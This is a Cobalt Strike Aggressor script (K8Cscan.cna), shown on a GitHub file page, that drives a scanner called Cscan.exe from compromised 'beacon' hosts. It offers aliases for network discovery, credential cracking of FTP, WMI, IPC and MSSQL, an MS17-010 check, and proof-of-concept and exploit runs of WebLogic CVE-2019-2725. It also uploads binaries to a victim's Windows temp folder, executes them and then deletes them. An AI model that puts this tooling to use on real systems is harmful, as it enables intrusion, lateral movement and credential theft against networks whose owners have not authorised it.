forked from k8gege/Aggressor
-
Notifications
You must be signed in to change notification settings - Fork 0
/
K8Cscan.cna
71 lines (66 loc) · 2.39 KB
/
K8Cscan.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#Cobalt Strike 3.x
#Cscan 5.4
#author: k8gege
#update: 20191101
#Not Support [SmbScan MysqlScan OracleScan SSHscan]
alias Cscan {
if (-exists script_resource("Cscan.exe")) {
if ($2 eq "help"){
blog2($1, "Usage:");
#blog2($1, "Cscan 1");
blog2($1, "Cscan ip");
blog2($1, "Cscan ip scantype");
#blog2($1, "Cscan nocheck");
blog2($1, "Cscan nocheck ip");
blog2($1, "Cscan nocheck ip scantype");
blog2($1, "ScanType:(Discover/Crack/Encode/Exploit)");
blog2($1, "ip: [ip ip/24 ip/26 ip/8]");
blog2($1, "scantype: [OnlineIP OnlinePC OSscan CiscoScan]");
blog2($1, "scantype: [WebScan WebScan2 SameWeb UrlScan WhatCMS WebDir SubDomain HostIP DomainIP]");
blog2($1, "scantype: [MS17010 WeblogicPoc WeblogicExp PhpStudyPoc ActiveMQPoc]");
blog2($1, "scantype: [FtpScan WmiScan IpcScan MssqlScan]");
blog2($1, "scantype: [EnumMSSQL EnumShare]");
blog2($1, "scantype: [EnHex DeHex EnBase64 DeBase64]");
blog2($1, "Example: Cscan 192.168.1.8 OnlinePC");
blog2($1, "Example: Cscan 192.168.1.8/24 OnlinePC");
blog2($1, "Example: Cscan 192.168.1.8/24 *.dll(c#)");
return;}else
{bexecute_assembly!($1, script_resource("Cscan.exe"), $2.' '.$3.' '.$4.' '.$5);}
}else {berror($1, "Cscan.exe does not exist :(");}
}
sub CscanStart {
blog2($bid,"Cscan ".$3["moudle"]);
bcd!($bid, "c:\\windows\\temp");
brm!($bid,"Cscan.exe");
brm!($bid,"netscan.dll");
#bshell!($bid,"del Cscan**.exe");
if($3["moudle"] !eq "Default"){
brm!($bid, "netscan.dll");
}
bupload!($bid, script_resource("bin\\Cscan".$3['clrver'].".exe"));
bmv!($bid, "Cscan".$3['clrver'].".exe", "Cscan.exe");
if($3["moudle"] !eq "Default"){
bupload!($bid, script_resource("bin\\".$3['moudle']."\\netscan".$3['clrver'].".dll"));
bmv!($bid, "netscan".$3['clrver'].".dll", "netscan.dll");
}
bshell!($bid, "Cscan.exe");
#bpause($1, 10000);
brm!($bid,"Cscan.exe");
if($3["moudle"] !eq "Default"){
brm!($bid, "netscan.dll");
}
}
alias CVE-2019-2725-POC {
if (-exists script_resource("Cscan.exe")) {
if ($2 eq ""){
return;}else
{bexecute_assembly!($1, script_resource("Cscan.exe"), $2.' WeblogicPoc');}
}else {berror($1, "Cscan.exe does not exist :(");}
}
alias CVE-2019-2725-EXP {
if (-exists script_resource("Cscan.exe")) {
if ($2 eq ""){
return;}else
{bexecute_assembly!($1, script_resource("Cscan.exe"), $2.' WeblogicExp');}
}else {berror($1, "Cscan.exe does not exist :(");}
}